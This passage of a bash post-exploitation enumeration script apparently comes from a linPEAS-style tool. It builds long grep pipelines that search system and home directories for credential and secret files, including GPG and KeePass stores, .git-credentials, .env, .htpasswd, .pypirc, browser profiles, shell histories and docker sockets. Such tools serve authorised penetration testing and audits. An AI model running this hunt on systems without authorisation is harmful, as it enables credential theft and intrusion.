'/lib' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e 